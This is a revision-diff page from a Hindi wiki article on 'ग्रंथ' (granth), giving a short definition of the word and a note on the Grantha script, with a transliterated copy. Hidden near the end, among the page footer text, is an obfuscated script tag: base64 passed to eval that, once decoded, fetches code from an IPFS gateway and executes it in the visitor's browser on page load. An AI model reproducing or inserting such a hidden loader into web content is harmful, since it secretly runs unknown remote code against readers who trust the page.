Difference between revisions of "ग्रंथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Guru-Granth-Sahib.jpg|thumb|गुरु ग्रंथ साहिब]]
 
[[चित्र:Guru-Granth-Sahib.jpg|thumb|गुरु ग्रंथ साहिब]]
*ग्रंथ वह किताब या पुस्तक जिसके पन्नें या पृष्ठ पहले गाँठ बाँधकर रखे जाते थे।  
+
*ग्रंथ वह '''किताब या पुस्तक''' जिसके पन्ने या पृष्ठ प्राचीन समय में गाँठ बाँधकर रखे जाते थे।  
*ग्रंथ [[धर्म|धार्मिक]] या [[साहित्य|साहित्यिक]] दृष्टि से कोई महत्त्वपूर्ण बड़ी पुस्तक है। [[संस्कृत]] के ग्रंथ तथा [[अभिलेख]] लिखने के लिए जिस [[लिपि]] का दक्षिण भारत में उपयोग होता था, उसी को आगे चलकर ‘[[ग्रन्थ लिपि]]’ का नाम दिया गया।  
+
*ग्रंथ [[धर्म|धार्मिक]] या [[साहित्य|साहित्यिक]] दृष्टि से कोई महत्त्वपूर्ण बड़ी पुस्तक है। [[संस्कृत]] के ग्रंथ तथा [[अभिलेख]] लिखने के लिए जिस [[लिपि]] का [[दक्षिण भारत]] में उपयोग होता था, उसी को आगे चलकर ‘[[ग्रन्थ लिपि]]’ का नाम दिया गया।  
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 11:22, 4 October 2011

thumb|guru granth sahib

  • granth vah kitab ya pustak jisake panne ya prishth prachin samay mean gaanth baandhakar rakhe jate the.
  • granth dharmik ya sahityik drishti se koee mahattvapoorn b di pustak hai. sanskrit ke granth tatha abhilekh likhane ke lie jis lipi ka dakshin bharat mean upayog hota tha, usi ko age chalakar ‘granth lipi’ ka nam diya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh